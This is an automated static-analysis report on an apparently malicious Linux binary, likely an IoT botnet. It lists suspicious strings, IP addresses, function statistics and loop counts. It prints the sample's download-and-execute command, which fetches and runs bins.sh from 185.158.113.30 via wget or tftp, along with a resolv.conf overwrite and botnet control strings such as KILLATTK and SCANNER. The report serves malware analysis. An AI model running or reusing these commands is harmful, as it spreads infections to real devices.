=============================================================================
========	BINARY ID :509b577042372a9a1b8d430318528435165d99da==================================================
================================================================================
================================================================================
========	STRINGS SUMMARY : =====================================================
================================================================================
TOTAL STRINGS COUNT :622
SUPSCPECTED LINES COUNT :46
SUPSCPECTED STRINGS COUNT (DISTINCT) :18
SUPSCPECTED STRINGS WEIGHT :65
SUSPECT STRING SCORE : [65 / 150] 43%
USER AGENTS STRINGS COUNT :0
STATIC IPs STRINGS COUNT :2
DYNAMIC IPs STRINGS COUNT :1
================================================================================
========	STRINGS DETAILS : =====================================================
================================================================================
================================================================================
========	SUSPECTED STRINGS : =====================================================
================================================================================
busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n
/bin/sh
/proc/cpuinfo
PING
Invalid flag "%s"
GETLOCALIP
KILLATTK
/proc/net/route
%sWelcome to the botnet [%s:%s:%d cores] :)%s
%sCould not connect to commServer!%s\n
SCANNER
SCANNER ON | OFF
SCANNER STOPPED!
attempting to start scanner
SCANNER STARTED!
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
No such process
Interrupted system call
No child processes
Too many open files in system
Read-only file system
Level 2 not synchronized
Machine is not on the network
Name not unique on network
Interrupted system call should be restarted
Socket operation on non-socket
Protocol wrong type for socket
Socket type not supported
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
Transport endpoint is already connected
Transport endpoint is not connected
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
^8PSh
^8PSh
xAPPSh4
PPSh @
^8PSh
================================================================================
========	USER AGENTS STRINGS : =====================================================
================================================================================
================================================================================
========	STATIC IP ADRESSES : =====================================================
================================================================================
185.158.113.30:7
8.8.8.8
================================================================================
========	DYNAMIC IP MASKS : =====================================================
================================================================================
%d.%d.%d.%d
================================================================================
========	/proc FOLDER ACCESS : =====================================================
================================================================================
/proc/cpuinfo
/proc/net/route
================================================================================
========	HISTORY TEMPERING : =====================================================
================================================================================
================================================================================
========	AUTOINSTALL COMMANDS : =====================================================
================================================================================
================================================================================
========	FUNCTIONS SUMMARY : =====================================================
================================================================================
+++TOTAL FILE LINES			: 21430
+++TOTAL FUNCTIONS 			:139
+++LINES PER FUNCTION RATIO 	: 154.172661870504
+++SUSPECTED LINES COUNT 	: 209
+++SUSPECTED LINES RATIO 	: 0.975268315445637
================================================================================
========	WHILES SUMMARY : =====================================================
================================================================================
+++TOTAL FILE LINES				: 21430
+++WHILE (TRUE) LINES			: 4728
+++WHILE (TRUE) LINES RATION		:22.0625291647224%
+++WHILE (TRUE) LOOPS COUNT		: 33
================================================================================
========	SYSTEM FILES SUMMARY : ================================================
================================================================================
        "cd /var/ || cd /tmp/ || cd /var/run( || cd /var/tmp/ || cd /dev/ || cd /mnt/\r\n",
        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n",
        "busybox echo || echo nameserver 8.8.8.8 > /etc/resolv.conf\r\n"
        "cd /var/ || cd /tmp/ || cd /var/run( || cd /var/tmp/ || cd /dev/ || cd /mnt/\r\n",
        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n"
    char (*v15)[125] = "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n";
    char (*v16)[61] = "busybox echo || echo nameserver 8.8.8.8 > /etc/resolv.conf\r\n";
                    function_8050a60((int32_t)"/bin/sh", (int32_t)"sh", (int32_t)"-c", a1, 0);
                        function_8050a60((int32_t)"/bin/sh", (int32_t)"sh", (int32_t)"-c", a1, 0);
                    function_8050a60((int32_t)"/bin/sh", (int32_t)"sh", (int32_t)"-c", a1, 0);
                        function_8050a60((int32_t)"/bin/sh", (int32_t)"sh", (int32_t)"-c", a1, 0);
    int32_t v76 = function_804dfa8("/proc/cpuinfo", 0); // 0x8048f42
    int32_t v76 = function_804dfa8("/proc/cpuinfo", 0); // 0x80490ff
    if (function_804dfa8("/dev/null", v78) != v76) {
================================================================================
========	IP PATTERNS SUMMARY : =================================================
================================================================================
        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n",

        "busybox echo || echo nameserver 8.8.8.8 > /etc/resolv.conf\r\n"

        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n"

    char (*v15)[125] = "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n";

    char (*v16)[61] = "busybox echo || echo nameserver 8.8.8.8 > /etc/resolv.conf\r\n";

                                    function_8048885(v101, (int32_t)"%d.%d.%d.%d", v88 % 256, (int32_t)v81, (int32_t)v84, v102);

                            function_8048885(v101, (int32_t)"%d.%d.%d.%d", v88 % 256, (int32_t)v81, (int32_t)v84, v102);

================================================================================
========	SYSTEM CALLS SUMMARY : ================================================
================================================================================
================================================================================
========	FUNCTIONS LIST : =======================================================
================================================================================
FUNCTION_NAME                                     |ARGS|LENGH   |SUSPCET_INSTRC|WHILE_INSTRC|
----------------------------------------------------------------------------------------------
function_8050c58                                  |1   |858     |133           |0           |
----------------------------------------------------------------------------------------------
function_8049eba                                  |0   |1334    |14            |1194        |
----------------------------------------------------------------------------------------------
function_804f8ae                                  |1   |3541    |7             |2075        |
----------------------------------------------------------------------------------------------
function_80491f8                                  |3   |192     |4             |81          |
----------------------------------------------------------------------------------------------
function_804f284                                  |2   |206     |4             |111         |
----------------------------------------------------------------------------------------------
function_8048f2e                                  |1   |145     |4             |58          |
----------------------------------------------------------------------------------------------
function_8048094                                  |0   |88      |3             |0           |
----------------------------------------------------------------------------------------------
function_8048d8a                                  |2   |143     |3             |0           |
----------------------------------------------------------------------------------------------
function_804863d                                  |3   |383     |3             |283         |
----------------------------------------------------------------------------------------------
function_8049774                                  |1   |152     |2             |65          |
----------------------------------------------------------------------------------------------
function_8051f58                                  |2   |180     |2             |83          |
----------------------------------------------------------------------------------------------
function_80500b1                                  |1   |223     |2             |121         |
----------------------------------------------------------------------------------------------
function_804e308                                  |0   |127     |2             |31          |
----------------------------------------------------------------------------------------------
function_8050418                                  |0   |205     |2             |6           |
----------------------------------------------------------------------------------------------
function_805149c                                  |4   |158     |2             |74          |
----------------------------------------------------------------------------------------------
function_8048441                                  |4   |421     |2             |30          |
----------------------------------------------------------------------------------------------
function_804df74                                  |4   |89      |1             |0           |
----------------------------------------------------------------------------------------------
function_8051374                                  |5   |89      |1             |0           |
----------------------------------------------------------------------------------------------
function_804ded8                                  |0   |90      |1             |0           |
----------------------------------------------------------------------------------------------
function_8049a2e                                  |1   |340     |1             |251         |
----------------------------------------------------------------------------------------------
function_80490e5                                  |0   |97      |1             |0           |
----------------------------------------------------------------------------------------------
function_804de24                                  |1   |89      |1             |0           |
----------------------------------------------------------------------------------------------
function_8048cde                                  |3   |120     |1             |28          |
----------------------------------------------------------------------------------------------
function_805076c                                  |2   |161     |1             |37          |
----------------------------------------------------------------------------------------------
function_804956d                                  |0   |108     |1             |17          |
----------------------------------------------------------------------------------------------
function_805119c                                  |5   |89      |1             |0           |
----------------------------------------------------------------------------------------------
function_8048b7a                                  |1   |131     |1             |24          |
----------------------------------------------------------------------------------------------
function_804dfa8                                  |2   |94      |1             |0           |
----------------------------------------------------------------------------------------------
function_8050e57                                  |8   |569     |1             |19          |
----------------------------------------------------------------------------------------------
function_804e0dc                                  |4   |98      |1             |0           |
----------------------------------------------------------------------------------------------
function_8049875                                  |0   |179     |1             |91          |
----------------------------------------------------------------------------------------------
function_8048d46                                  |1   |105     |1             |18          |
----------------------------------------------------------------------------------------------
function_804dd1c                                  |0   |79      |1             |0           |
----------------------------------------------------------------------------------------------
function_804de88                                  |1   |90      |1             |0           |
----------------------------------------------------------------------------------------------
function_8048358                                  |1   |133     |1             |16          |
----------------------------------------------------------------------------------------------
function_804f1f0                                  |2   |99      |1             |15          |
----------------------------------------------------------------------------------------------
function_804de54                                  |2   |89      |0             |0           |
----------------------------------------------------------------------------------------------
function_804818d                                  |0   |78      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e2f1                                  |1   |78      |0             |0           |
----------------------------------------------------------------------------------------------
function_8048ec0                                  |2   |79      |0             |0           |
----------------------------------------------------------------------------------------------
function_804dd34                                  |3   |100     |0             |0           |
----------------------------------------------------------------------------------------------
function_804e390                                  |1   |90      |0             |0           |
----------------------------------------------------------------------------------------------
function_80480c0                                  |0   |109     |0             |0           |
----------------------------------------------------------------------------------------------
unknown_0                                         |1   |0       |0             |0           |
----------------------------------------------------------------------------------------------
function_804f868                                  |2   |89      |0             |0           |
----------------------------------------------------------------------------------------------
function_8048110                                  |0   |78      |0             |0           |
----------------------------------------------------------------------------------------------
function_805101f                                  |4   |101     |0             |0           |
----------------------------------------------------------------------------------------------
function_804df00                                  |2   |89      |0             |0           |
----------------------------------------------------------------------------------------------
function_805112c                                  |2   |89      |0             |0           |
----------------------------------------------------------------------------------------------
function_80493a5                                  |4   |135     |0             |0           |
----------------------------------------------------------------------------------------------
function_8049c7a                                  |1   |79      |0             |0           |
----------------------------------------------------------------------------------------------
function_80488cb                                  |2   |86      |0             |0           |
----------------------------------------------------------------------------------------------
function_804f210                                  |2   |99      |0             |0           |
----------------------------------------------------------------------------------------------
function_8050802                                  |4   |116     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f5dc                                  |5   |77      |0             |0           |
----------------------------------------------------------------------------------------------
function_8050674                                  |2   |105     |0             |0           |
----------------------------------------------------------------------------------------------
function_804dd8c                                  |4   |89      |0             |0           |
----------------------------------------------------------------------------------------------
function_804deb0                                  |3   |85      |0             |0           |
----------------------------------------------------------------------------------------------
function_804f64c                                  |4   |77      |0             |0           |
----------------------------------------------------------------------------------------------
function_8049e8b                                  |1   |86      |0             |0           |
----------------------------------------------------------------------------------------------
function_8048885                                  |6   |79      |0             |0           |
----------------------------------------------------------------------------------------------
function_8050da0                                  |0   |119     |0             |0           |
----------------------------------------------------------------------------------------------
entry_point                                       |1   |83      |0             |0           |
----------------------------------------------------------------------------------------------
function_804f1b0                                  |3   |89      |0             |0           |
----------------------------------------------------------------------------------------------
function_8050de3                                  |0   |92      |0             |0           |
----------------------------------------------------------------------------------------------
function_8049d52                                  |2   |82      |0             |0           |
----------------------------------------------------------------------------------------------
function_805057c                                  |1   |89      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e164                                  |3   |78      |0             |0           |
----------------------------------------------------------------------------------------------
function_8050ddf                                  |1   |78      |0             |0           |
----------------------------------------------------------------------------------------------
function_8050de2                                  |2   |79      |0             |0           |
----------------------------------------------------------------------------------------------
function_8052358                                  |0   |80      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e074                                  |5   |89      |0             |0           |
----------------------------------------------------------------------------------------------
function_8048518                                  |1   |159     |0             |0           |
----------------------------------------------------------------------------------------------
function_8050e17                                  |0   |88      |0             |0           |
----------------------------------------------------------------------------------------------
function_804f4e3                                  |1   |78      |0             |0           |
----------------------------------------------------------------------------------------------
function_80509f8                                  |1   |91      |0             |0           |
----------------------------------------------------------------------------------------------
function_804f758                                  |1   |79      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e180                                  |3   |89      |0             |0           |
----------------------------------------------------------------------------------------------
function_8051294                                  |0   |89      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e1cc                                  |1   |88      |0             |0           |
----------------------------------------------------------------------------------------------
function_8052004                                  |0   |80      |0             |0           |
----------------------------------------------------------------------------------------------
function_8052018                                  |1   |89      |0             |0           |
----------------------------------------------------------------------------------------------
function_8048407                                  |2   |90      |0             |0           |
----------------------------------------------------------------------------------------------
function_804dff3                                  |2   |78      |0             |0           |
----------------------------------------------------------------------------------------------
function_8050024                                  |0   |113     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f460                                  |2   |92      |0             |0           |
----------------------------------------------------------------------------------------------
function_8049e0d                                  |5   |80      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e134                                  |1   |89      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e03c                                  |3   |89      |0             |0           |
----------------------------------------------------------------------------------------------
function_8050259                                  |1   |274     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f4d0                                  |1   |78      |0             |0           |
----------------------------------------------------------------------------------------------
function_80512bc                                  |4   |89      |0             |0           |
----------------------------------------------------------------------------------------------
function_8048298                                  |1   |82      |0             |0           |
----------------------------------------------------------------------------------------------
function_8050630                                  |1   |83      |0             |0           |
----------------------------------------------------------------------------------------------
function_8051258                                  |0   |89      |0             |0           |
----------------------------------------------------------------------------------------------
function_8051324                                  |1   |127     |0             |0           |
----------------------------------------------------------------------------------------------
function_8049191                                  |2   |93      |0             |0           |
----------------------------------------------------------------------------------------------
function_80511d0                                  |1   |96      |0             |0           |
----------------------------------------------------------------------------------------------
function_8051e00                                  |4   |79      |0             |0           |
----------------------------------------------------------------------------------------------
function_804f4dc                                  |1   |78      |0             |0           |
----------------------------------------------------------------------------------------------
function_805052c                                  |1   |85      |0             |0           |
----------------------------------------------------------------------------------------------
function_8049679                                  |3   |126     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f584                                  |3   |77      |0             |0           |
----------------------------------------------------------------------------------------------
function_80488a7                                  |1   |79      |0             |0           |
----------------------------------------------------------------------------------------------
function_804f1d8                                  |3   |79      |0             |0           |
----------------------------------------------------------------------------------------------
function_804f4ef                                  |1   |78      |0             |0           |
----------------------------------------------------------------------------------------------
function_804f888                                  |0   |97      |0             |0           |
----------------------------------------------------------------------------------------------
function_80503f5                                  |1   |79      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e290                                  |0   |81      |0             |0           |
----------------------------------------------------------------------------------------------
function_80505d9                                  |3   |84      |0             |0           |
----------------------------------------------------------------------------------------------
function_804f55c                                  |1   |85      |0             |0           |
----------------------------------------------------------------------------------------------
function_804f440                                  |1   |78      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e00c                                  |1   |92      |0             |0           |
----------------------------------------------------------------------------------------------
function_8051110                                  |8   |85      |0             |0           |
----------------------------------------------------------------------------------------------
function_8048984                                  |2   |382     |0             |0           |
----------------------------------------------------------------------------------------------
function_80481ac                                  |0   |78      |0             |0           |
----------------------------------------------------------------------------------------------
function_805070d                                  |2   |103     |0             |0           |
----------------------------------------------------------------------------------------------
function_804e1ec                                  |1   |78      |0             |0           |
----------------------------------------------------------------------------------------------
function_8051160                                  |5   |89      |0             |0           |
----------------------------------------------------------------------------------------------
function_804ddcc                                  |1   |79      |0             |0           |
----------------------------------------------------------------------------------------------
function_8051fec                                  |1   |79      |0             |0           |
----------------------------------------------------------------------------------------------
function_80480b0                                  |1   |79      |0             |0           |
----------------------------------------------------------------------------------------------
function_8048229                                  |1   |87      |0             |0           |
----------------------------------------------------------------------------------------------
function_80510f8                                  |0   |80      |0             |0           |
----------------------------------------------------------------------------------------------
function_804f72c                                  |2   |92      |0             |0           |
----------------------------------------------------------------------------------------------
function_804e1b8                                  |1   |79      |0             |0           |
----------------------------------------------------------------------------------------------
function_8048120                                  |0   |85      |0             |0           |
----------------------------------------------------------------------------------------------
function_8051208                                  |0   |89      |0             |0           |
----------------------------------------------------------------------------------------------
function_8050a60                                  |5   |104     |0             |0           |
----------------------------------------------------------------------------------------------
function_8051280                                  |0   |78      |0             |0           |
----------------------------------------------------------------------------------------------
function_804df34                                  |3   |89      |0             |0           |
----------------------------------------------------------------------------------------------
function_8052330                                  |0   |97      |0             |0           |
----------------------------------------------------------------------------------------------
function_804f618                                  |4   |77      |0             |0           |
----------------------------------------------------------------------------------------------
function_804f848                                  |4   |89      |0             |0           |
----------------------------------------------------------------------------------------------
function_8048efb                                  |1   |100     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f700                                  |4   |77      |0             |0           |
----------------------------------------------------------------------------------------------
function_8048197                                  |0   |78      |0             |0           |
----------------------------------------------------------------------------------------------
function_8051230                                  |0   |89      |0             |0           |
----------------------------------------------------------------------------------------------
function_8049caa                                  |2   |142     |0             |0           |
----------------------------------------------------------------------------------------------
================================================================================
========	FUNCTIONS SUSPECTED INSTRUNCTIONS : ===================================
================================================================================
=================FUNCTION : function_8050c58 ===================
++++++++ FUNCTION START 17218
++++++++ FUNCTION END 18076
++++++++ FUNCTION LENGTH 858
        case 0: {
        case 1: {
        case 2: {
        case 3: {
        case 4: {
        case 5: {
        case 6: {
        case 7: {
        case 8: {
        case 9: {
        case 10: {
        case 11: {
        case 12: {
        case 13: {
        case 14: {
        case 15: {
        case 16: {
        case 17: {
        case 18: {
        case 19: {
        case 20: {
        case 21: {
        case 22: {
        case 23: {
        case 24: {
        case 25: {
        case 26: {
        case 27: {
        case 28: {
        case 29: {
        case 30: {
        case 31: {
        case 32: {
        case 33: {
        case 34: {
        case 35: {
        case 36: {
        case 37: {
        case 38: {
        case 39: {
        case 40: {
        case 41: {
        case 42: {
        case 43: {
        case 44: {
        case 45: {
        case 46: {
        case 47: {
        case 48: {
        case 49: {
        case 50: {
        case 51: {
        case 52: {
        case 53: {
        case 54: {
        case 55: {
        case 56: {
        case 57: {
        case 58: {
        case 59: {
        case 60: {
        case 61: {
        case 62: {
        case 63: {
        case 64: {
        case 65: {
        case 66: {
        case 67: {
        case 68: {
        case 69: {
        case 70: {
        case 71: {
        case 72: {
        case 73: {
        case 74: {
        case 75: {
        case 76: {
        case 77: {
        case 78: {
        case 79: {
        case 80: {
        case 81: {
        case 82: {
        case 83: {
        case 84: {
        case 85: {
        case 86: {
        case 87: {
        case 88: {
        case 89: {
        case 90: {
        case 91: {
        case 92: {
        case 93: {
        case 94: {
        case 95: {
        case 96: {
        case 97: {
        case 98: {
        case 99: {
        case 100: {
        case 101: {
        case 102: {
        case 103: {
        case 104: {
        case 105: {
        case 106: {
        case 107: {
        case 108: {
        case 109: {
        case 110: {
        case 111: {
        case 112: {
        case 113: {
        case 114: {
        case 115: {
        case 116: {
        case 117: {
        case 118: {
        case 119: {
        case 120: {
        case 121: {
        case 122: {
        case 123: {
        case 124: {
        case 125: {
        case 126: {
        case 127: {
        case 128: {
        case 129: {
        case 130: {
        case 131: {
        case 149: {
=================FUNCTION : function_8049eba ===================
++++++++ FUNCTION START 5783
++++++++ FUNCTION END 7117
++++++++ FUNCTION LENGTH 1334
        while (true) {
            while (true) {
            while (true) {
                    case 0: {
                    case 1: {
                    case 2: {
                    case 3: {
                    case 4: {
                    case 5: {
                    case 6: {
                    case 7: {
                    case 8: {
            while (true) {
    while (true) {
=================FUNCTION : function_804f8ae ===================
++++++++ FUNCTION START 11714
++++++++ FUNCTION END 15255
++++++++ FUNCTION LENGTH 3541
                while (true) {
                    while (true) {
                while (true) {
                        while (true) {
                while (true) {
                    while (true) {
            while (true) {
=================FUNCTION : function_80491f8 ===================
++++++++ FUNCTION START 4046
++++++++ FUNCTION END 4238
++++++++ FUNCTION LENGTH 192
        while (true) {
            function_80488cb(v84, (int32_t)"PING");
                while (true) {
        while (true) {
=================FUNCTION : function_804f284 ===================
++++++++ FUNCTION START 10056
++++++++ FUNCTION END 10262
++++++++ FUNCTION LENGTH 206
    while (true) {
    while (true) {
                    while (true) {
            while (true) {
=================FUNCTION : function_8048f2e ===================
++++++++ FUNCTION START 3702
++++++++ FUNCTION END 3847
++++++++ FUNCTION LENGTH 145
    int32_t v76 = function_804dfa8("/proc/cpuinfo", 0); // 0x8048f42
        while (true) {
                while (true) {
                                while (true) {
=================FUNCTION : function_8048094 ===================
++++++++ FUNCTION START 209
++++++++ FUNCTION END 297
++++++++ FUNCTION LENGTH 88
        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n",
        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n"
    char (*v15)[125] = "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n";
=================FUNCTION : function_8048d8a ===================
++++++++ FUNCTION START 3371
++++++++ FUNCTION END 3514
++++++++ FUNCTION LENGTH 143
        case 42: {
        case 63: {
        case 0: {
=================FUNCTION : function_804863d ===================
++++++++ FUNCTION START 1982
++++++++ FUNCTION END 2365
++++++++ FUNCTION LENGTH 383
    while (true) {
                    while (true) {
                        while (true) {
=================FUNCTION : function_8049774 ===================
++++++++ FUNCTION START 4619
++++++++ FUNCTION END 4771
++++++++ FUNCTION LENGTH 152
    while (true) {
        while (true) {
=================FUNCTION : function_8051f58 ===================
++++++++ FUNCTION START 20778
++++++++ FUNCTION END 20958
++++++++ FUNCTION LENGTH 180
    while (true) {
                while (true) {
=================FUNCTION : function_80500b1 ===================
++++++++ FUNCTION START 15374
++++++++ FUNCTION END 15597
++++++++ FUNCTION LENGTH 223
    while (true) {
            while (true) {
=================FUNCTION : function_804e308 ===================
++++++++ FUNCTION START 9455
++++++++ FUNCTION END 9582
++++++++ FUNCTION LENGTH 127
        while (true) {
    while (true) {
=================FUNCTION : function_8050418 ===================
++++++++ FUNCTION START 15959
++++++++ FUNCTION END 16164
++++++++ FUNCTION LENGTH 205
                while (true) {
            while (true) {
=================FUNCTION : function_805149c ===================
++++++++ FUNCTION START 20535
++++++++ FUNCTION END 20693
++++++++ FUNCTION LENGTH 158
    while (true) {
            while (true) {
=================FUNCTION : function_8048441 ===================
++++++++ FUNCTION START 1396
++++++++ FUNCTION END 1817
++++++++ FUNCTION LENGTH 421
                while (true) {
            while (true) {
=================FUNCTION : function_804df74 ===================
++++++++ FUNCTION START 8121
++++++++ FUNCTION END 8210
++++++++ FUNCTION LENGTH 89
    int32_t v76 = kill(pid, sig_num); // 0x804df87
=================FUNCTION : function_8051374 ===================
++++++++ FUNCTION START 20443
++++++++ FUNCTION END 20532
++++++++ FUNCTION LENGTH 89
    int32_t v76 = wait4(pid, status, options, rusage); // 0x8051391
=================FUNCTION : function_804ded8 ===================
++++++++ FUNCTION START 7844
++++++++ FUNCTION END 7934
++++++++ FUNCTION LENGTH 90
    int32_t pid = getpid(v76); // 0x804dee1
=================FUNCTION : function_8049a2e ===================
++++++++ FUNCTION START 4956
++++++++ FUNCTION END 5296
++++++++ FUNCTION LENGTH 340
    while (true) {
=================FUNCTION : function_80490e5 ===================
++++++++ FUNCTION START 3850
++++++++ FUNCTION END 3947
++++++++ FUNCTION LENGTH 97
    int32_t v76 = function_804dfa8("/proc/cpuinfo", 0); // 0x80490ff
=================FUNCTION : function_804de24 ===================
++++++++ FUNCTION START 7479
++++++++ FUNCTION END 7568
++++++++ FUNCTION LENGTH 89
    int32_t v76 = close(fd); // 0x804de34
=================FUNCTION : function_8048cde ===================
++++++++ FUNCTION START 3140
++++++++ FUNCTION END 3260
++++++++ FUNCTION LENGTH 120
    while (true) {
=================FUNCTION : function_805076c ===================
++++++++ FUNCTION START 16734
++++++++ FUNCTION END 16895
++++++++ FUNCTION LENGTH 161
            while (true) {
=================FUNCTION : function_804956d ===================
++++++++ FUNCTION START 4379
++++++++ FUNCTION END 4487
++++++++ FUNCTION LENGTH 108
        while (true) {
=================FUNCTION : function_805119c ===================
++++++++ FUNCTION START 19581
++++++++ FUNCTION END 19670
++++++++ FUNCTION LENGTH 89
    int32_t v76 = clock_getres(clk_id, res); // 0x80511af
=================FUNCTION : function_8048b7a ===================
++++++++ FUNCTION START 3006
++++++++ FUNCTION END 3137
++++++++ FUNCTION LENGTH 131
        while (true) {
=================FUNCTION : function_804dfa8 ===================
++++++++ FUNCTION START 8213
++++++++ FUNCTION END 8307
++++++++ FUNCTION LENGTH 94
    int32_t fd = open(path, 0x1000000 * a2 / 0x1000000); // 0x804dfd3
=================FUNCTION : function_8050e57 ===================
++++++++ FUNCTION START 18550
++++++++ FUNCTION END 19119
++++++++ FUNCTION LENGTH 569
        while (true) {
=================FUNCTION : function_804e0dc ===================
++++++++ FUNCTION START 8670
++++++++ FUNCTION END 8768
++++++++ FUNCTION LENGTH 98
        int32_t v76 = sigprocmask(how, set, (struct _TYPEDEF_sigset_t *)oset); // 0x804e113
=================FUNCTION : function_8049875 ===================
++++++++ FUNCTION START 4774
++++++++ FUNCTION END 4953
++++++++ FUNCTION LENGTH 179
        while (true) {
=================FUNCTION : function_8048d46 ===================
++++++++ FUNCTION START 3263
++++++++ FUNCTION END 3368
++++++++ FUNCTION LENGTH 105
    while (true) {
=================FUNCTION : function_804dd1c ===================
++++++++ FUNCTION START 7120
++++++++ FUNCTION END 7199
++++++++ FUNCTION LENGTH 79
    uint32_t result = vfork(); // 0x804dd22
=================FUNCTION : function_804de88 ===================
++++++++ FUNCTION START 7663
++++++++ FUNCTION END 7753
++++++++ FUNCTION LENGTH 90
    int32_t v77 = fork(v76); // 0x804de91
=================FUNCTION : function_8048358 ===================
++++++++ FUNCTION START 1167
++++++++ FUNCTION END 1300
++++++++ FUNCTION LENGTH 133
    while (true) {
=================FUNCTION : function_804f1f0 ===================
++++++++ FUNCTION START 9852
++++++++ FUNCTION END 9951
++++++++ FUNCTION LENGTH 99
    while (true) {
================================================================================
========	WHILE LOOPS INTRESTING INSTRUCTIONS : =================================
================================================================================
=============================WHILE LOOPS ID : 4 @ function_804863d ====================================
++++++++ WHILE START : 2074 
++++++++ WHILE FUNCTION : function_804863d 
++++++++ WHILE END : 2357 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 8 @ function_8048f2e ====================================
++++++++ WHILE START : 3782 
++++++++ WHILE FUNCTION : function_8048f2e 
++++++++ WHILE END : 3840 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 9 @ function_80491f8 ====================================
++++++++ WHILE START : 4142 
++++++++ WHILE FUNCTION : function_80491f8 
++++++++ WHILE END : 4213 
++++++++ INTRESTING INSTRUCTIONS :  
		function_80488cb(v84, (int32_t)"PING");
		while (true) {
=============================WHILE LOOPS ID : 12 @ function_8049774 ====================================
++++++++ WHILE START : 4705 
++++++++ WHILE FUNCTION : function_8049774 
++++++++ WHILE END : 4770 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 15 @ function_8049eba ====================================
++++++++ WHILE START : 5908 
++++++++ WHILE FUNCTION : function_8049eba 
++++++++ WHILE END : 7098 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		case 0: {
		case 1: {
		case 2: {
		case 3: {
		case 4: {
		case 5: {
		case 6: {
		case 7: {
		case 8: {
		while (true) {
=============================WHILE LOOPS ID : 21 @ function_804f284 ====================================
++++++++ WHILE START : 10165 
++++++++ WHILE FUNCTION : function_804f284 
++++++++ WHILE END : 10261 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 24 @ function_804f8ae ====================================
++++++++ WHILE START : 12109 
++++++++ WHILE FUNCTION : function_804f8ae 
++++++++ WHILE END : 14023 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 25 @ function_804f8ae ====================================
++++++++ WHILE START : 14030 
++++++++ WHILE FUNCTION : function_804f8ae 
++++++++ WHILE END : 14056 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 27 @ function_80500b1 ====================================
++++++++ WHILE START : 15473 
++++++++ WHILE FUNCTION : function_80500b1 
++++++++ WHILE END : 15594 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 32 @ function_805149c ====================================
++++++++ WHILE START : 20618 
++++++++ WHILE FUNCTION : function_805149c 
++++++++ WHILE END : 20692 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 33 @ function_8051f58 ====================================
++++++++ WHILE START : 20866 
++++++++ WHILE FUNCTION : function_8051f58 
++++++++ WHILE END : 20949 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
